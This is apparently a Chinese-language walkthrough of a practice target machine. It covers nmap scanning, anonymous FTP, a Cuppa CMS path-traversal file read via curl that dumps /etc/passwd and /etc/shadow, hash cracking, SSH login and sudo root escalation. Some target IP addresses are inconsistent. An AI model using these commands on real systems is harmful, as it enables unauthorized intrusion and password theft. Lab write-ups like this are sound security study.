文章目录

一、主机发现

二、服务探测

三、挖掘漏洞

ftp渗透

Mysql登录

Web渗透

四、提权

---

一、主机发现

Kali IP：192.168.78.128

靶机IP：192.168.78.184

nmap -sP 192.168.78.0/24 

二、服务探测

端口探测

nmap -sT -sV -p- 192.168.78.184

漏洞探测

nmap -script=vuln -p21,22,80,3306 192.168.78.184

获取到wordpress框架信息，以及ftp匿名登录信息，这里没显示出来

目录文件探测

dirsearch -u http://192.168.78.184
dirb http://192.168.78.184

查找出该页面存在administrator目录：http://192.168.78.184/administrator/installation/

发现是Title[Cuppa CMS]框架！CuppaCMS是一套内容管理系统(CMS)!

三、挖掘漏洞

ftp渗透

ftp 192.168.203.138

输入后进入匿名登录，匿名登录的账号都是anonymous，密码为空，直接回车

下载里面的文件

mget *.txt

Md5和base64解密后没利用价值

有一串颠倒的字符和人员信息，颠倒字符解密网站：https://www.upsidedowntext.com/

字符解密后也没有利用价值，继续看其他服务

Mysql登录

mysql -h 192.168.203.138 -u root -p

显示不允许登录连接

Web渗透

前面我们知道了网站存在CuppaCMS，在kali搜索一下是否有漏洞信息

searchsploit cuppa cms

Copy到根目录查看一下

这里需要改一下路径

http://192.168.78.184/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

但是没显示

翻阅代码知道：它是用post的方式来处理传过来的参数的，并且没有做任何处理。

使用curl，对数据进行url编码，并且通过post的方式进行传递，这里省略详细过程。（看的wp）

curl --data-urlencode  urlConfig=../../../../../../../../../etc/passwd http://192.168.78.184/administrator/alerts/alertConfigField.php

成功显示，继续看一下shadow文件

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.78.184/administrator/alerts/alertConfigField.php

将有密码的行保存下来去破解

首先破解了这两个www-data , w1r3s账户，试试w1r3s的相关权限

ssh w1r3s@192.168.78.184

四、提权

尝试sudo提权：Sudo -l

我们发现用户有三个ALL权限，意味着基本等于root用户了。

那我们启动一个新的bash会话，新建一个sh文件

echo '/bin/bash' >> root.sh
chmod +x root.sh
sudo ./root.sh

提权成功